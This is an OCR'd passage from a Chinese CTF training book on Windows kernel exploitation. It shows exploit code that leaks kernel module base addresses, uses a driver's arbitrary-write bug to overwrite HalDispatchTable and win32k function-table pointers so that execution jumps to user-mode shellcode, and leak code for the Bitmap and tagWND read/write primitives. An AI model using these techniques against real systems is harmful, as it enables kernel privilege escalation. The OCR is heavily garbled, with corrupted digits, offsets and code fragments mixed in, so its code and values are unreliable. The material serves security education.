Image: usermode.exe 


当 内 核 驱 动 从 冰 数 栈 上 返回 时 会 跳 转 到 用 尸 态 分 配 的 内 存 空间 中 进行 执行 ， 见 图 6-9-40。 


2. 内 核 任 意 地 址 写 利 用 


对 于 任意 地 址 写 漏洞 来 说 ,利用 的 重点 是 如 何 寻 找 一 个 可 以 支持 程序 流程 的 位 置 。 例 如 C++ 程 序 的 虚 
表 或 许 是 一 个 极 佳 的 目标 ， 虽然 Windows 内 核 空 间 中 没有 C++ 虚 表 却 存在 许多 类 似 的 数据 结构 ， 其 
中 最 广为人知 的 是 NT 模块 中 的 HalDispatchTable。 


HalDispatchTable 是 一 个 全 局 的 函数 指针 表 : 


HAL_DISPATCH HalDispatchTable = { 

HAL_DISPATCH_VERSION, 

xHalQuerySystemInformation, 

xHalSetSystemInformation, 

xHalQueryBusSlots, 

9， 
kd> g 
Breakpoint 2 hit 
stack overflow!lDispatchControl+8xb9: 
fffff886 937b1429 c3 ret 


kd> dq rsp 


fffff886 8@4af89c8 
fffff886 694af89d8 
fffff886 94af89e8 
fffff886 694af89f8 
fffff886 64af8a08 
fffff886 604af8al18 
fffff886 94af8a28 
fffff886 94af8a38 


66666666 066d6666 fffffa88 191fc666 
fffffa86 1aec9116 fffffa86 1aec9228 


fffffa86 1aec091196 
fffff886 04af8a28 
9606006606 06666669 
fffff700 9010866060 
fffffa86 1af14d89 
960606606 9096666669 


9660666696 746Cc6644 
fffff886 04af8a68 
fffffa80 00321a596 
9606666676 1ba2bb61 
6806006000 06606679 
fffffa86 1aec9116 


kd> dq 86666666 866d6666 


690666666 9066d6666 
60606666666 0966d66196 
06666666 9666d66296 
666606666 0966d6636 
960666666 0966d6646 
0660666666 96966d66596 
6060666666 666d6669 
600666666 0966d66796 
kd> p 

06666666 966d6666 


xHalExamineMBR, 
xHalIloAssignDriveLetters, 
xHalIloReadPartitionTable, 
XxHaLIoSetPartitionInformation， 
xHaLIowWritepartitionTabLe ， 
xHalHandlerForBus, 
xHalReferenceHandler., 
xHalReferenceHandler, 
xHalInitPpnpDriver, 
xHalInitPowerManagement, 
(pHalGetDmaAdapter) NULL, 
xHalGetInterruptTranslator, 
xHalStartMirroring, 
xHalEndMirroring, 
xHalMirrorPhysicalMemory, 
xHalEnd0OfBoot, 
xHalMirrorPhysicalMemory 


通常 ， 程 序 可 以 通 


调用 了 KeQuerylntervalProfile 国 数 ， 


见 图 6-9-41。 


906666666 606008Cccc 
96060066606 9686666669 
9066066606 06666669 
6080606000000 96666669 
96006606 960666669 
9606066606 986666669 
00606666 968666669 
9606066606 96006669 


int 


图 6-9-40 


CC 


过 调用 NtQuerylntervalProfile 国 数 来 触 上 友 它 ， 因 为 NtQuerylntervalProfile 内 部 


Me Te Es 
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NE LGA iieldiEtITeliTS 有 
HalDispatchTable 
下 面 通过 一 个 例子 来 实验 内 核 任 意 地 址 写 漏洞 通过 HalDispacthTable 将 控制 流动 持 到 用 户 地 址 空间 的 


shellcode 上 。 这 个 过 程 与 前 面 的 枝 洛 出 类 似 ， 同 样 是 比较 简单 的 利用 过 程 。 但 是 这 里 需要 先 通 过 序 


言 部 分 介绍 过 的 函数 来 泄露 NT 模块 的 地 址 ， 从 而 得 到 HalDispacthTable 的 地 址 ， 见 图 6-9-42。 


我 们 编写 的 通过 NtQuerySystemlnformation 函 数 泄露 NT 模块 的 代码 如 下 : 


PVOID leak_nt_module(VOID) { 
DWORD ReturnLength = 0; 
PSYSTEM_MODULE_INFORMATION ModuLeBLockPtr = NULL; 
NTSTATUS Status = 0; 
DWORD i = 9; 


NtQueryIntervalProfile proc near 
arg 0@= qword ptr 8 


_uUnwind { // _C specific handler 
[rspt+arg 060], rbx 
rdi 
rsp，296h 
rbx，rdx 
rax, gs:188h 
dil, [rax+1F6h] 
dil, dil 
short loc 1403F1A88 


loc 1403F1A72: 

_try { // _ except at loc 1403F1A86 
rax, cs:MmUserProbeAddress 
rdx, rax 
rdx, rax 
eax, [rdx] 
[rdx], eax 
short loc 1403F1A88 

} // starts at 1403F1A72 


loc 1403F1A88: 


图 6-9-41 
KeQueryIntervalprofile proc near 


var_ 18= qword ptr -18h 
var_19= dword ptr -19h 
arg 0= qword ptr 8 


rsp, 38h 
eCX, ecCX 
short loc 1403E2C88 


loc 1403E2C80: 
ecx, 1 
short loc 1403E2C8D 


loc_1403E2C8D: ; _QWORD 

MmOV edx, 98Ch 

MmOV dword ptr [rsp+38h*+var 18], ecx ; _QWORD 
lea r9, [rsp+38h*+arg 69] ; _QWORD 

lea ecx，[rdx-9Bh] 

lea r8, [rsp+*38h*+var 18 


图 6-9-42 
PVOID ModuleBase = NULL; 
PCHAR ModuleName = NULL; 


Status = NtQuerySystemInformation(SystemModuleInformation, 
NULL， 
9， 


&ReturnLength) ; 


ModuLeBLockpPtr = (PSYSTEM_MODULE_INFORMATION)HeapAlloc(GetProcessHeap(), 
HEAP_ZERO_MEMORY, ReturnLength); 


Status = NtQuerySystemInformation(SystemModuleInformation, 
ModuLeBLockPtr， 
ReturnLength, 
&ReturnLength) ; 


if (!NT_SUCCESS(Status)) { 
printf("NtQuerySystemInformation failed %x\n", Status); 
return NULL; 

} 


for (i = 0; i < ModuleBlockPtr->ModulesCount; i++) { 
PVOID ModuleBase = ModuLeBLockPtr->ModuLes[i] .ImageBaseAddress; 
PCHAR ModuleName = ModuLeBLockPtr->ModutLes[i] .Name; 
if(!strcmp("\\SystemRoot\\system32\\ntoskrnl .exe", ModuleName)) 
return ModuleBase; 
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} 
return NULL; 
} 


NtQuerySsystemlnformation 是 一 个 根据 Systemlnformation 参 数 确定 返回 值 类 型 的 函数 ， Yoon 
中 有 很 多 APl 都 是 这 种 设计 。 因 此 我 们 先 在 第 一 次 调用 这 个 函数 时 传递 缓冲 区 的 大 小 为 0 字 节 ， 这 样 
会 将 实际 需要 的 绥 ; 冲 区 大 小 作为 ReturnLength 参 数 返回 ， 骨 根 据 返 回 的 大 小 来 分 配 实际 的 绥 冲 区 并 
进行 第 二 次 调用 ， 与 之 类 似 的 不 确定 返回 数据 长 度 的 API 都 是 采取 这 种 调用 方式 的 。 


这 里 需要 手动 定义 NtQuerySysteminformation 函 数 的 原型 、 传 入 参数 的 结构 等 ， 其 实 这 些 数 据 结构 
和 了 逆 数 声明 在 Windows 的 各 类 头 文件 中 就 可 以 找到 。 具 体 代码 如 下 : 


#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 9) 


typedef struct SYSTEM_MODULE { 
ULONG Reservedl; 
ULONG Reserved2; 
#ifdef _WIN64 
ULONG Reserved3; 
#endif 
PVOID ImageBaseAddress; 
ULONG _ ImageSize; 
ULONG Flags; 
WORD Id; 
WORD Rank ; 
WORD WwW918 ; 
WORD NameOffset; 
CHAR Name[255] ; 
} SYSTEM_MODULE ，*PSYSTEM_MODULE ; 


typedef struct SYSTEM_MODULE_INFORMATION { 
ULONG ModulesCount; 


SYSTEM_MODULE Modules[1]; 
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; 


typedef enum _SYSTEM_INFORMATION_CLASS { 
SystemModuleInformation = 11 
} SYSTEM_INFORMATION_CLASS; 


extern "C" NTSTATUS NtQuerySystemInformation( 
__in SYSTEM_INFORMATION_CLASS SystemInformationClass, 
-~inout PVOID SystemInformation, 
__in ULONG SystemInformationLength, 
__out_opt PULONG ReturnLength 
); 


在 声明 NtQuerySystemlnformation 函 数 原 型 时 需要 增加 extern"C" 的 辅助 声明 ， 这 是 因为 Visual 人 

默认 为 驱动 项 目 生成 的 代码 文件 是 *.cpp， 在 编译 时 也 会 按照 C++ 代 码 来 进行 编译 ， 但 是 按照 C+ 
+ 编译 的 国 数 符号 是 市 有 类 信息 的 ， 在 进行 链接 时 会 找 不 到 对 应 的 lib 文 件 中 的 函数 。 当 然 ， 将 cpp 改 
为 “.c 后 缀 也 是 可 以 的 ， 这 样 残 不 需要 extern"C" 了 。 


打开 项 目 属性 页 ， 选 择 “ 链 接 器 一 输入 ”， 在 “附加 依赖 项 ”中 添加 “ntdll.lib” ， 因 为 


Ne@| 2 
图 数 是 由 ntdll.dl 导 出 的 ， 见 图 6-9-43。 当 然 ， 使 用 Visual Studio 的 编译 器 安 增 力 


~ ”配置 管理 器 (0)- 
ntdill.lib:kernel32.lb;user32 .lib;gdi32 .lib;winspool.lib;comdig32 .lib:advapi32 .lib;shell 


附加 信 遇 项 
指定 要 添加 到 链接 命令 行 的 附加 项 ，[ 例 如 kermel32.lib] 
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图 6-9-43 
我 们 成 功 获得 了 NT 模块 的 基地 址 ( 见 图 6-9-44) 。 其 他 利用 函数 泄露 内 核 模 块 地 址 或 其 他 对 象 地 址 
的 方法 与 乙 类 似 ， 不 再 班 述 。 如 果 想 要 进一步 了 解 其 他 泄露 方法 ， 这 里 推荐 在 Github 上 搜索 一 个 名 为 
windows kernel address leaks 的 开源 项 目 ， 其 中 做 了 很 好 的 总 结 。 


日 int main () 
| { 
HANDLE hDevice = NULL; 
CONTROL_PACKET Packet = {0}; 

DWORD BytesReturn = 0; 
LPVOID Address = NULL; 


PVOID NtBase = NULL; 


NtBase = leak nt_module(); @ NtBase Oxfffff80023e00000 


hDevice = CreateFile( 已 用 时 间 <= lms 
DFVTCF SYMROTTC NAMF . 


图 6-9-44 
综 上 所 述 ， 我 们 编写 的 利用 代码 如 下 : 


PVOID leak_nt_module(VOID) { 
DWORD ReturnLength = 0; 
PSYSTEM_MODULE_INFORMATION ModuLeBLockPtr = NULL; 
NTSTATUS Status = 0; 
DWORD i = 0; 
PVOID ModuleBase = NULL; 
PCHAR ModuleName = NULL; 
Status = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &ReturnLength); 


ModuLeBLockPtr = (PSYSTEM_MODULE_INFORMATION)HeapAlloc(GetProcessHeap(), 
HEAP_ZERO_MEMORY, ReturnLength); 
Status = NtQuerySystemInformation(SystemModuleInformation, ModuleBLlockPtr, 
ReturnLength, &ReturnLength); 


if (!NT_SUCCESS(Status)) { 
printf("NtQuerySystemInformation failed %x\n", Status); 
return NULL; 

} 


for (i = 0; i < ModuLeBLockPtr->ModuLesCount; i++) { 
PVOID ModuleBase = ModuleBlockPtr->Modules[i].ImageBaseAddress; 
PCHAR ModuleName = ModuleBLockPtr->Modules[i].Name; 
if(!strcemp("\\SystemRoot\\system32\\ntoskrnl .exe", ModuleName)) 

return ModuleBase; 
} 
return NULL; 
} 


int main() { 
HANDLE hDevice = NULL; 
CONTROL_PACKET Packet = {0}; 
DWORD BytesReturn = 9; 
LPVOID Address = NULL; 
PVOID NtBase = NULL; 


NtBase = leak_nt_module(); 
hDevice = CreateFile(DEVICE_SYMBOLIC_NAME, 
GENERIC_ALL, 
9， 
9， 
OPEN_EXISTING, 
FILE_ATTRIBUTE_SYSTEM, 
0); 
if (hDevice == INVALID_HANDLE_VALUE) { 
DWORD ErrorCode = GetLastError(); 
printf("CreateFile = %d\n", ErrorCode); 
return 0; 


} 


Address = VirtualAlloc(NULL, Ox1060, MEM_COMMIT, PAGE_EXECUTE_READWRITE); 
RtlCopyMemory(Address, "\xCC\xCC", 2); 


Packet .Parameter._AAW.Where = (INT64)NtBase + QOxle9c30 + Qx8; 
Packet .Parameter._AAW.What = (INT64)Address; 


if (!DeviceIoControl(hDevice, WAA_CTL_CODE, &Packet, sizeof(Packet), &Packet, 
sizeof(Packet), &BytesReturn, 0)) { 
DWORD ErrorCode = GetLastError(); 
printf("DeviceIoControl = %d\n", ErrorCode); 
return 0; 


*(PINT64)((INT64)Address + 8) = (INT64)Address + 8; 
NtQueryIntervalProfile(ProfileTotalIssues, (PULONG)(INT6d4)Address + 8); 
system("pause"); 

return 0; 


我 们 通过 逆向 得 出 HalDispacthTable 在 NT 模块 中 的 偏 移 为 0x1e9c30,， 且 xHalQuerySystem- 
Information 


es ESINIONIININ Nl Ed 
的 逻辑 ， 所 以 需要 在 用 户 态 内 存 空间 进行 一 些 设置 。 


图 6-9-45 
忌 之 ， 利 用 代码 与 栈 洪 出 利用 相似 ， 比 较 简单 ， 思 路 在 于 通过 任意 地 址 写 寻找 可 以 控制 程序 执行 流程 


https://weread.qq.com/web/reader/77d32500721a485577d8eeek283328802332838023a7529 





2021/1/16 从 0 到 1: CTFer 成 长 之 路 -Nu1L 战 队 - 微 信 读书 
的 数据 结构 。 
HalDispacthTable 可 以 利用 的 函数 指针 不 止 xXHalQuerySystemlnformation，Windows 内 核 中 可 以 
利用 的 这 种 数据 结构 也 不 止 HalDispacthTable， 如 在 win32k.sys 模 块 中 也 存在 大 量 的 函数 使 用 类 似 
的 全 局 指针 表 进 行 调用 ( 见 图 6-9-46) 。 


这 里 挑选 一 个 流程 比较 简单 的 函数 作为 示例 ， 如 NtGdiDdDDIAcquireKeyedMutex 就 通过 win32k 中 
的 全 局 函数 表 进 行 调用 ( 见 图 6-9-47) 。 


利用 代码 如 下 : 


extern "C" NTSTATUS NtQueryIntervaLProfiLe(IN KPROFILE_SOURCE ProfileSource, OUT PULONG Interval); 
extern "C" NTSTATUS D3DKMTAcquireKeyedMutex(PVOID *Arg1); 


PVOID leak_nt_module(VOID) { 
DWORD ReturnLength = 0; 
SAE aword_ FFFFF97FFF2D5SAS dq 7 
qword_FFFFF97FFF2D5586 dq ? 
qword_FFFFF97FFF2D55B8 dq ? 


qword_FFFFF97FFF2D55C0 dq ? 
qword_FFFFF97FFF2D55C8 dq ? 
qword_FFFFF97FFF2D55D@ dq ? 
qword_FFFFF97FFF2D55D8 dq ? 
qword_FFFFF97FFF2D55E0 dq ? 
qword_FFFFF97FFF2D55E8 dq ? 
qword_FFFFF97FFF2D55F6 dq ? 
qword_FFFFF97FFF2D55F8 dq ? 
qword_FFFFF97FFF2D5666 dq ? 
qword_FFFFF97FFF2D5668 dq ? 
qword_FFFFF97FFF2D5610 dq ? 

8 qword_FFFFF97FFF2D5618 dq ? 
0 qword_FFFFF97FFF2D5620 dq ? 
qword_FFFFF97FFF2D5628 dq ? 
qword_FFFFF97FFF2D5636 dq ? 
qword_FFFFF97FFF2D5638 dq ? 
qword_FFFFF97FFF2D5649 dq ? 
qword_FFFFF97FFF2D5648 dq ? 
qword_FFFFF97FFF2D5650 dq ? 

5658 qword_FFFFF97FFF2D5658 dq ? 
60 qword_FFFFF97FFF2D5660 dq ? 
68 qword_FFFFF97FFF2D5668 dq ? 


rsp, 28h 

rax, cs:qword_ FFFFF97FFF2D5670 
Fax> rax 

short loc FFFFF97FFF18C3B8 


jmp short loc_ FFFFF97FFF18C3BD loc_FFFFF97FFF18C3B8: 
mov eax，0C 上 660606607Ah 


图 6-9-47 


PSYSTEM_MODULE_INFORMATION ModuleBlockPtr = NULL; 
NTSTATUS Status = 0; 

DWORD i = 9; 

PVOID ModuleBase = NULL; 

PCHAR ModuleName = NULL.; 


Status = NtQuerySystemInformation(SystemModuleInformation, NULL, 09, &ReturnLength); 
ModuleBlockPtr = (PSYSTEM_MODULE_INFORMATION)HeapAlloc(GetProcessHeap(), 
HEAP_ZERO_MEMORY, ReturnLength); 
Status = NtQuerySystemInformation(SystemModuleInformation, ModuleBlockPtr, 
ReturnLength, &ReturnLength); 


if (!INT_SUCCESS(Status)) { 
printf("NtQuerySystemInformation failed %x\n", Status); 
return NULL; 

} 


for (i = 0; i < ModuLeBLockPtr->ModuLesCount; i++) { 
PVOID ModuleBase = ModuleBLockPtr->Modules[i].ImageBaseAddress; 
PCHAR ModuleName = ModuLeBLockPtr->ModuLes[i] .Name; 
if(!strcmp("\\SystemRoot\\System32\\win32k.sys", ModuleName)) 
return ModuLeBase; 


} 
return NULL; 
} 


int main() { 
HANDLE hDevice = NULL; 
CONTROL_PACKET Packet = {0}; 
DWORD BytesReturn = 0; 
LPVOID Address = NULL; 
PVOID NtBase = NULL; 


NtBase = leak_nt_module(); 


hDevice = CreateFile(DEVICE_SYMBOLIC_NAME, GENERIC_ALL, 9, 9, 
OPEN_EXISTING, FILE_ATTRIBUTE_SYSTEM, 0); 
if (hDevice == INVALID_HANDLE_VALUE) { 
DWORD ErrorCode = GetLastError(); 
printf("CreateFile = %d\n", ErrorCode); 
return 0; 


8 


Address = VirtuaLALLoc(CNULL，9x1999，MNEM_CONMMIT，PAGE_EXECUTE_READWRITE) ; 
RtlCopyMemory(Address, "\xCC\xCC", 2); 


Packet .Parameter._AAW.Where = (INT64)NtBase + Qx2d5670; 
Packet .Parameter._AAW.What = (INT64)Address; 


if (!DeviceIoControl(hDevice, WAA_CTL_CODE, &Ppacket, sizeof(Packet), 
S&Ppacket, sizeof(Packet), &BytesReturn, 0)) { 
DWORD ErrorCode = GetLastError(); 
printf("DeviceIoControL = %d\n", ErrorCode); 
return 0; 


} 


D3DKMTAcquireKeyedMutex(NULL); 
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system("pause"); 
return 0; 
} 


这 次 利用 中 通过 NtQuerySystemlnformation 泄 露出 win32k.sys 模 块 的 基地 址 ， 再 计算 函数 表 的 地 址 
并 通过 任意 地 址 写 进行 劫持 ， 整 个 过 程 比较 简单 ， 不 表 玖 述 


6.9.2.6 内 核 缓 解 指 施 与 读 写 原 语 


目 Windows 7 以 来 ， 每 一 代 新 发 布 的 Windows 操 作 系 统 相 比 前 作 多 多 少 少 在 内 核 漏洞 防御 方面 增加 
了 绥 解 措施 ， 如 NULL Dereference Protection、NonPagedPoolNX、|ntel SMEP、 Intel Secure 
、int 0x29、Win32k Filter 等 。SMEP (Supervisor Mode Execution Protection) 是 Intel 在 
中 引入 的 一 种 漏洞 缓解 措施 ， 其 作用 是 阻止 Ring0 特 权 模 式 下 执行 Ring3 地 址 空间 的 代码 。 实 际 上 
在 2011 年 ，Intel 已 经 在 lvy Bridge 引 入 了 SMEP 特 性 ,但 是 Windows 操 作 系 统 直 到 Windows 8 才 予 
以 支持 。 


下 面 来 看 SMEP 的 细节 。 首 先 ，Intel 把 SMEP 的 开关 设置 在 CR4 窜 存 器 的 第 20 位 ， 见 图 6-9-48。 i 
处 于 启用 状态 ， 当 以 Ring0 权 限 试 图 执行 用 尸 模 式 地 址 空间 的 代码 时 会 被 拒绝 ， 见 图 6-9-49。 





图 6-9-48 


— Instruction fetches from user-mode addresses. 
Access rights depend on the values of CR4.SMEP: 
*， IfCR4.SMEP = 0, access rights depend on the paging mode and the value of IA32_EFER.NXE: 
— For 32-| Nt EFER.NXE = 0, instructions may be fetched from any user-mode 
address 


一 For PAE pagng or IA-22¢ paging wh JA32_ EFER.NXE = 1, instructions may be fetched from any 
mode address ress with a translation for which the XD fag is OIn every paging-structure entry 

oa fe tarball nN; instructions may not be fetched from any user-mode address with a 
A TO Wh TD flagis 1 inany Od Wr the translation. 


图 6-9-49 
同时 ， 从 Windows 8.1 起 针对 内 核 地 址 泄露 沙 数 做 了 限制 ， 实 现 的 万 法 是 通过 进程 完整 性 级 别 ee 
level) 进行 控制 。 在 Windows 操 作 系统 中 ， 进 程 或 者 其 他 内 核对 象 的 安全 性 均 由 目 主 访问 控制 
符 (DACL) 来 管理 。 进 程 完整 性 级 别 其 实 也 可 以 视 为 DACL 中 特殊 的 一 项 ， 它 同样 位 于 进程 的 令 牌 
(kel<JD 


进程 完整 性 级 别 分 为 System、High、Medium、Low、untrusted， 对 于 内 核 利 用 来 说 ， 其 主要 是 限 
制 了 在 较 低 完整 性 级 别 时 通过 这 些 函 数 来 获取 内 核 的 信息 。 


由 于 前 文 这 学 缓解 措施 的 出 现 ， 一 方面 使 得 泄露 内 核 地 址 信息 变 得 困难 ， 另 一 方面 使 得 攻击 者 难以 分 

合适 的 内 存 存 放 shellcode， 昌 然 此 时 仍然 可 以 通过 内 核 地 址 泄露 漏洞 与 内 存 破 坏 漏 洞 结合 的 方式 
进行 利用 ,但 是 相对 而 言 成 本 过 高 。 因 此 攻击 者 在 进行 内 核 利 用 时 考虑 不 使 用 shellcode， 而 是 通过 
寻求 获取 读 写 原 语 的 方式 来 进行 利用 ， 即 : 把 漏洞 转化 为 不 受 限 制 的 任意 地 址 (绝对 地 址 或 相对 地 
址 ) 读 和 任意 地 址 写 操 作 ， 再 通过 任意 地 址 读 和 任意 地 址 写 来 实现 最 终 的 利用 。 


这 里 简单 介绍 两 个 内 核 漏洞 利用 历史 上 出 现 过 的 比较 经 典 的 内 核 读 写 原 语 : Bitmap 原 语 、tagWND 


原 语 。 


通过 之 前 的 分 析 不 难 想到 ， 想 达到 内 核 内 存 任 总 读 写 的 效果 ， 无 非 是 在 内 核 空间 中 寻找 一 些 内 核对 
象 。 这 些 内 核对 象 需 要 具有 一 些 指针 域 或 者 长 度 域 ， 如 在 浏览 器 利用 技术 中 经 常 以 Array 作 为 获取 内 
仓 读 写 原 语 的 途径 ， 因 为 Array 对 象 通 弟 具 有 一 个 长 度 域 和 一 个 指针 表示 数据 存储 的 组 ;中 区 。 当 控制 

这 些 对 象 的 指针 域 或 长 度 域 时 ， 任 意 内 存 读 、 写 的 目的 束 达 到 了 。 当 然 ， 与 用 户 态 的 利用 不 同 ， 目 
标 内 核对 每 不 仅 需要 满足 以 上 条 件 ， 还 需要 直接 在 用 尸 空 间 能 被 访问 到 ， 并 且 必 须 能 够 在 用 尸 态 获知 
它 的 地 址 信息 ， 否 则 目的 无 法 达到 。Bitmap 正 是 这 样 一 种 GDI 对 象 ， 其 结构 如 下 ， 其 中 存在 一 个 指针 
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域名 为 pvScan0。 


typedef struct _SURFOBJ { 
DHSURF dhsurf; 
HSURF hsurf; 


DHPDEV dhpdev; 


HDEV hdev; 
SIZEL sizlBitmap; 
ULONG cjBits; 
PVOID pvBits; 
PVOID pvScang; 
LONG lDelta; 
ULONG iUniq; 
ULONG iBitmapFormat; 
USHORT iType; 
USHORT fjBitmap; 
} SURFOBJ; 


SetBitmapBits 是 由 gdi32.dll 模 块 导 出 的 一 个 Win32 API 函 数 ， 可 以 在 用 户 态 直接 调用 。 
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划 行 操作 ， 其 内 核实 现 阔 数 为 NtGdisetBitmapBits。 其 中 仔 在 以 下 代码 : 


pjDst = psurf-> 
pjSrc = pvBits; 
lDeltaDst = psurf->Surf0bj.lDelta; 

lDeltaSrc = WIDTH_BYTES_ALIGN16(nWidth, 


Surf0bj .pvScang; 


while (nHeight--) { 
memcpy(pjDst, pjSrc, 
pjSrc += LDeLtaSrci 
pjDst += lDeltaDst; 
} 


LDeLtaSrc) ; 


cBitspixel); 


区 


可 见 ，SURFOBJ 对 象 中 的 pvScan0 参 数 是 作为 缓冲 区 指针 来 直接 使 用 的 。 同 样 ， 在 Win32 API 函 
对 应 的 内 核 浮 数 NtGdiGetBitmapBits 中 存在 类 似 的 代码 如 下 ， 和 直接 以 pvScan0 域 作为 


组 中 区 指针 读 取 数据 并 返回 用 户 态 。 


pjSrc = psurf->Surf0bj.pvScangi; 

pjDst = pvBits; 

lDeltaSrc = psurf->Surf0bj.lDelta; 

lDeltaDst = WIDTH_BYTES_ALIGN16(nWidth, 

while CnHeight--) { 
RtlCopyMemory(pjDst, pjSrc, lDeltaDst); 
pjSrc += LDeLtaSrc i 
pjDst += lDeltaDst; 

} 


tagWND 的 情况 与 Bitmap 类 似 ， 是 在 内 核 中 表示 窗 体 的 一 个 GUI 对 象 ， 


typedef struct tagWND { 
struct tagWND x*parent; 
struct tagWND x*child; 
struct tagWND *next; 
struct tagWND x*owner; 
void x*pVScroll; 
void x*pHScroll; 
HWND hwndSelf; 
HINSTANCE hInstance; 
DWORD dwStyle; 
DWORD dwExStyle; 


UINT wIDmenu; 
HMENU hSysMenu; 
RECT rectClient; 
RECT rectWindow; 
LPWSTR text; 
DWORD cbWndExtra; 
DWORD flags; 
DWORD wExtra[l1]; 

} WND; 


在 Windows 的 各 类 数据 结构 的 设计 中 ， 通 


域 。 在 tagWND 中 ，wExtra 域 表示 其 尾部 是 不 定 长 的 缓冲 区 ，cbWndExtra 表 示 其 长 度 域 。 通 


这 两 个 域 ， 即 可 达到 任意 地 址 读 、 写 的 目的 。 


下 面 来 看 如 何在 用 户 态 获取 Bitmap 和 tagWND 对 和 象 的 内 核 地 址 信息 。 
进程 环境 块 ) 位 于 进程 的 用 户 空 间 中 ， 其 中 保存 许多 进程 的 相关 信息 。 用 户 态 下 ， 段 


Block, 


cBitspixel); 


其 结 栓 


pi 


数 


itmap 


GetBitmapBits 


党 以 一 个 单位 长 度 的 数组 表示 可 变 长 缓冲 区 并 辅 以 数据 长 度 
过 修改 


PEB (Process Environment 


寄存 器 


GS 始 终 指向 TEB， 从 而 轻易 地 得 到 PEB 的 位 置 。 在 PEB 中 存在 一 个 名 为 GdisharedHandleTable 的 


域 , 它 是 一 个 结构 数组 ， 见 图 6-9-50。 


+0xQe8 NumberOfHeaps 


+Oxoec MaximumNumberOfHeaps : 
: Ptr64 Ptr64 Void 


+OXxof6 ProcessHeaps 
+Oxof8 


+OXx166 ProcessStarterHelper : 
+OXx168 GdiDCAttributeList : 
: [4] UChar 

: Ptr64 RTL CRITICAL SECTION 
: Uint4B 

: Uint4B 

: Uint2B 


+Ox16c Padding3 
+09x116 LoaderLock 
+0xX118 OSMajorVersion 
+@x11c OSMinorVersion 
+0x128 OSBuildNumber 


: Uint4B 


Uint4B 


: Ptr64 Void 
Ptr64 Void 
Uint4B 


图 6-9-50 


GdiSharedHandleTable 数 组 中 的 结构 是 GDICELL64。 
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kyPSWST SCAUCLK 飞 
PVOID64 pkKernelAddress; 
USHORT wProcessId; 
USHORT wCount; 
USHORT wUpper; 
USHORT wType; 
PVOID64 pUserAddress; 
} GDICELL64; 


其 中 ，pKernelAddress 域 指向 的 就 是 Bitmap 对 象 的 地 址 。 泄 露 示 例 代 码 如 下 : 


typedef struct { 
PVOID64 pkernelAddress; 
USHORT wProcessId; 
USHORT WwCount; 
USHORT wUpper; 
USHORT wType; 
PVOID64 pUserAddress; 

} GDICELL64, *PGDICELLG4; 


PVOID leak_bitmap(VOID) { 
INT64 PebAddr = 0, TebAddr = 0; 
PGDICELL64 pGdiSharedHandleTable = NULL; 
HBITMAP BitmapHandle = 0; 
INT64 ArrayIndex = 0; 


BitmapHandle = CreateBitmap(QOx64, 1, 1, 32, NULL); 
TebAddr = (INT64)NtCurrentTeb(); 
PebAddr = *(PINT64)(TebAddr+ Qx60); 


pGdiSharedHandleTable = *(PGDICELL64*)(PebAddr + 9x9f8) ; 
ArrayIndex = (INT64)BitmapHandle & Qxffff; 
return pGdiSharedHandleTable[ArrayIndex] .pKernelAddress; 


TEB 结 构 中 ，ProcessEnvironmentBlock 域 的 偏 移 Gx60 字 节 指 向 关联 的 PEB， 见 图 6-9-51。 


@: kd> dt nt! TEB 
+69x666 NtTib : _NT_TIB 
+9x638 EnvironmentPointer : Ptr64 Void 
+0x840 ClientId : _CLIENT_ID 
+9Xx656 ActiveRpcHandle : Ptr64 Void 
+0x858 ThreadLocalSstoragePointer : Ptr64 Void 
+0x868 ProcessEnvironmentBlock : Ptr64 PEB 


图 6-9-51 
TEB 结 构 中 GdiSharedHandleTable 域 的 偏 移 为 Oxf8， 见 图 6-9-52，。 


mit pr ea : Uint8B 
HeapDeCommitFreeBlockThreshold : Uint8B 
NumberofHeaps : Uint4B 
MaximumNumberofHeaps : Uint4B 
ProcessHeaps : Ptr64 Ptr64 Void 
GdiSharedHandleTable : Ptr64 Void 
ProcessStarterHelper : Ptr64 Void 
GdiDCAttributeList :; Uint4B 

Padding3 : [4] UChar 

LoaderLock Ptr64 RTL CRITICAL SECTION 
OSsMajorVersion  : Uint4B 
OSMinorVersion  : Uint4B 
OSBuildNumber : Uint2B 

OSCSDVersion : Uint2B 

OsSPlatformId : Uint4B 
ImageSubsystem  : Uint4B 
ImageSubsystemMajorVersion : Uint4B 
ImageSubsystemMinorVersion : Uint4B 
Padding4 : [4] UChar 
ActiveProcessAffinityMask : Uint8B 


图 6-9-52 
CreateBitmap 国 数 返回 的 句柄 低位 为 数组 索引 值 ， 整 个 过 程 比较 简单 ， 不 再 详 述 


在 user32.dll 模 块 中 存在 一 个 名 为 gSharedinfo 的 全 局 指针 变量 : 


typedef struct _SHAREDINFO { 
PSERVERINFO psi; 


PHANDLEENTRY aheList; 
ULONG_PTR HeEntrySize; 
PDISPLAYINFO pDisplayInfo; 
ULONG_PTR ulSharedDelta; 
WNDMSG awmControl[31]; 
WNDMSG DefWindowMsgs; 
WNDMSG DefWindowSpecMsgs; 
} SHAREDINFO, *PSHAREDINFO; 


其 中 ，aheList 成 员 指 向 一 系列 的 HANDLEENTRY 结 构 ， 这 个 结构 实际 上 由 内 核 空间 直接 映射 而 来 ， 
因此 在 这 个 结构 中 ，phead 域 实际 指向 的 是 UserHandleTable 的 地 址 。 


typedef struct _HANDLEENTRY { 
PHEAD phead; // Pointer to the Object. 
PVOID pOwner; // PTI or PPI 
BYTE bType; // Object handle type 
BYTE bFlags; // Flags 
WORD wuniq; // Access count . 

} HANDLEENTRY, *PHE; 


https://weread.qq.com/web/reader/77d32500721a485577d8eeek283328802332838023a7529 





ee 从 0 到 1: CTFer 成 长 之 路 -Nu1L 战 队 - 微 信 读 书 
整个 港 露 过 程 的 代码 如 下 : 


PVOID leak_tagWND(VOID) { 
HMODULE ModuleHandle = NULL; 
PSHAREDINFO gSharedInfoptr = NULL; 


ModuleHandle = LoadLibrary(L"user32.d11"); 
gSharedInfoptr = GetPprocAddress(ModuleHandle, "gSharedInfo"); 
return gSharedInfoptr->aheList; 


gSharedinfo 是 user32 模 块 导出 的 变量 ， 可 以 直接 获取 。 同 样 比较 简 里 ， 不 再 评述 。 


6.9.3 参考 与 引用 


BlackHat USA 2017:Taking Windows 10 Kernel Exploitation To The Next Level 
Defcon 25:Demystifying Kernel Exploitation By Abusing GDI Objects 
BlackHat USA 2016:Attacking Windows By Windows 

ReactOS Project:ReactOS Project Wiki 

